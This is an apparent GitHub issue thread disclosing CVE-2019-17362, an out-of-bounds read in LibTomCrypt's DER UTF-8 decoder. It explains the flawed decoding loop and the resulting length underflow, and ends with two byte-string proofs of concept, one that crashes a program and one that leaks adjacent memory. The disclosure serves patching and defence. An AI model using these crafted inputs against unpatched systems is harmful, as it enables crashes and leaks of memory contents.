CVE-2019-17362 - vulnerability in der_decode_utf8_string

Question

CVE-2019-17362 - vulnerability in der_decode_utf8_string

werew opened this issue 5 years ago · comments

Description

The der_decode_utf8_string function (in der_decode_utf8_string.c) does not properly detect certain invalid UTF-8 sequences.
This allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) or read information from other memory locations via carefully crafted DER-encoded data.

Attack vectors

To exploit this vulnerability an attacker must be able to provide crafted DER-encoded data to LibTomCrypt (e.g. by importing a X509 certificate).
Information disclosure is made possible by a 2-steps attack where the imported data is later somehow re-encoded and sent to the attacker (e.g. import and then export X509 certificate).

Details

This vulnerability affects LibTomCrypt 1.18.2 and earlier versions.
For the remainder of this issue I will be referring to the code of LibTomCrypt last released version (i.e. version 1.18.2, https://www.libtom.net/news/LTC_1.18.2/).

The cause of the problem lies in the decoding-loop at line 71 of der_decode_utf8_string.c:

   /* proceed to decode */
   for (y = 0; x < inlen; ) {
      /* get first byte */
      tmp = in[x++];

      /* count number of bytes */
      for (z = 0; (tmp & 0x80) && (z <= 4); z++, tmp = (tmp << 1) & 0xFF);

      if (z > 4 || (x + (z - 1) > inlen)) {
         return CRYPT_INVALID_PACKET;
      }

      /* decode, grab upper bits */
      tmp >>= z;

      /* grab remaining bytes */
      if (z > 1) { --z; }
      while (z-- != 0) {
         if ((in[x] & 0xC0) != 0x80) {
            return CRYPT_INVALID_PACKET;
         }
         tmp = (tmp << 6) | ((wchar_t)in[x++] & 0x3F);
      }

      if (y < *outlen) {
         out[y] = tmp;
      }
      y++;
   }

Here the variable tmp contains the value of the first byte of the utf-8 encoded character.
In accordance to utf-8 encoding rules the number of most significant bits of tmp set at 1 (from left to right) prior to a 0, indicates the number of bytes used to encode the utf-8 character (i.e. a sequence starting by 110xxxxx indicates a size of 2 bytes) .

However notice that 10xxxxxx is not a valid 1st byte.
The loop in question fails to detect this case and process a sequence starting with 10xxxxxx as if it was a sequence of two bytes.

A valid utf-8 sequence of two bytes is of the form: 110xxxxx 10xxxxxx and can encode values up to 0x7FF. Yet der_decode_utf8_string accepts sequences of two bytes of the form: 10xxxxxx 10xxxxxx.
This invalid form offers an additional free bit and can therefore encode values up to 0xFFF, hence including a range of values that would normally be encodable only using a sequence of at least 3 bytes.

This behavior can be used to trick der_length_utf8_string into reporting a length bigger than the actual size of the encoded string.
This works because the function der_utf8_charsize returns a number of bytes based on the size of the decoded value.

To see an example of how this can be exploited to crash the program or read data after the DER-buffer, let us consider the function der_decode_sequence_flexi (used to decode X509 certificates).

When an utf-8 entry is encountered this function will first decode it in an array pointed by l->data and then compute the length using der_length_utf8_string on the decoded data:

         case 0x0C: /* UTF8 */

            /* init field */
            l->type = LTC_ASN1_UTF8_STRING;
            l->size = len;

            if ((l->data = XCALLOC(sizeof(wchar_t), l->size)) == NULL) {
               err = CRYPT_MEM;
               goto error;
            }

            if ((err = der_decode_utf8_string(in, *inlen, l->data, &l->size)) != CRYPT_OK) {
               goto error;
            }

            if ((err = der_length_utf8_string(l->data, l->size, &len)) != CRYPT_OK) {
               goto error;
            }
            break;

The computed lenis later used to move forward some pointers:

      /* advance pointers */
      totlen  += len;
      in      += len;
      *inlen  -= len;

The variable inlen points to the size of the remaining number of bytes to decode.
Using the aforementioned bug it is possible to craft an input such that len > *inlen.
In this case *inlen will underflow resulting in a much bigger value than the actual size of user's input.

Finally, this can be used to crash the program (e.g. by reading invalid memory location) or to trick the DER-decoder into including adjacent data into the decoded sequence.

PoC

Following I include two profs of concept.

poc1 will likely cause a program to crash by triggering a read of 0xffffffff additional bytes (thus probably ending up in an invalid memory page).
poc2 will add 0xffff bytes of adjacent memory to the decoded sequence. This data can then be accessed, in a 2-steps attack scenario, by exporting the certificate.
Notice that poc2 will very likely NOT cause the program to crash since any invalid DER-type encountered after the leaked data will just cause the decoding to stop gracefully without causing any further error (line 436 of der_decode_sequence_flexi.c).

char *poc1 = "\x30\x04"                  // Start DER-sequence of length 4
             "\x0c\x02\xbf\xbf"          // Start UTF8 string of actual length 2 and evaluated length 3
             "\xaa"                      // One byte padding
             "\x30\x84\xff\xff\xff\xff"; // Start DER-sequence of length 0xffffffff (will very likely cause a crash)

char *poc2 = "\x30\x04"                 // Start DER-sequence of length 4
             "\x0c\x02\xbf\xbf"         // Start UTF8 string of actual length 2 and evaluated length 3
             "\xaa"                     // One byte padding
             "\x04\x82\xff\xff";        // Start OCTECT sequence of length 0xffff
                                        // (this will include the adjacent data into the decoded certificate)

Luigi Coniglio · Answer 1 · Wed Oct 09 2019 19:25:54 GMT+0800 (China Standard Time)

This vulnerability has now been attributed CVE ID: CVE-2019-17362

James Muir · Answer 2 · Thu Dec 24 2020 00:47:04 GMT+0800 (China Standard Time)

@werew : your write-up on this issue is really good. Thanks!

One thing that seems unusual about the test vectors you provide (poc1, poc2) is that they begin with "\x30\x04..." but they are followed by more than four bytes. However, it doesn't seem like the der sequence length matters in this exploit.

What is important is the value of "inlen", which is the input length that is passed in to der_decode_sequence_flexi(). That is the value that is subject to underflow.